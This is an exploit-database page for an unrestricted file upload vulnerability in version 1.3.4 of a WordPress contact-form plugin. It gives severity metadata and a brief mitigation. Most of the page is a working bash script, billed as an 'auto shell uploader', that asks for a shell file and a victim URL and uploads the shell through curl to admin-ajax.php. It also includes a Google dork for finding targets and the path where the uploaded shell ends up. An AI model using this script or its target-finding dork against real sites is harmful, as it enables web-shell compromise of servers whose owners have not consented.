header-logo
Suggest Exploit
vendor:
Wordpress N-Media Website Contact Form with File Upload
by:
Claudio Viviani
7.5
CVSS
HIGH
Unrestricted File Upload
434
CWE
Product Name: Wordpress N-Media Website Contact Form with File Upload
Affected Version From: 1.3.2004
Affected Version To: 1.3.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wordpress
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux 1.1.0a / Curl 7.26.0
2015

WordPress N-Media Website Contact Form with File Upload 1.3.4

The 'upload_file()' ajax function in Wordpress N-Media Website Contact Form with File Upload 1.3.4 is affected from unrestircted file upload vulnerability, allowing an attacker to upload a malicious file to the server.

Mitigation:

Ensure that the application validates the file type and size of the uploaded file before allowing it to be uploaded to the server.
Source

Exploit-DB raw data:

#!/bin/bash
#
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4
# Google Dork : inurl:"/uploads/contact_files/"
# Exploit Author : Claudio Viviani
# Vulnerability discovered by : Claudio Viviani
# Script Written by : F17.c0de
# Software link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
# Version : 1.3.4
# Tested on : Kali Linux 1.1.0a / Curl 7.26.0
# Info: The "upload_file()" ajax function is affected from unrestircted file upload vulnerability
# Response : {"status":"uploaded","filename":"YOURSHELL"}
# Shell location http://VICTIM/wp-content/uploads/contact_files/YOURSHELL


echo '
+---------------------------------------------------------------+
|                                                               |
| Wordpress N-Media Website Contact Form with File Upload 1.3.4 |
|                                                               |
+---------------------------------------------------------------+
|                                                               |
|	Script by	   : F17.c0de                           |
|	Vuln Discovered by : Claudio Viviani                    |
|	Date		   : 15.04.2015                         |
|	Google Dork	   : inurl:"/uploads/contact_files/"    |
|	Vulnerability	   : "upload_file()" on admin-ajax.php  |
|	Description	   : Auto shell uploader                |
|                                                               |
+---------------------------------------------------------------+
|                       No System is Safe                       |
+---------------------------------------------------------------+
'

echo -n -e "Path of your shell: "
read bd
echo -n -e "Victim address [ex: http://www.victim.com]: "
read st
sleep 1
echo
echo "Uploading Shell. . ."
echo

curl -k -X POST -F "action=upload" -F "Filedata=@./$bd" -F "action=nm_webcontact_upload_file" $st/wp-admin/admin-ajax.php

echo
echo
echo "Job Finished"
echo

Navigation

Suggest Exploit

Services By CQR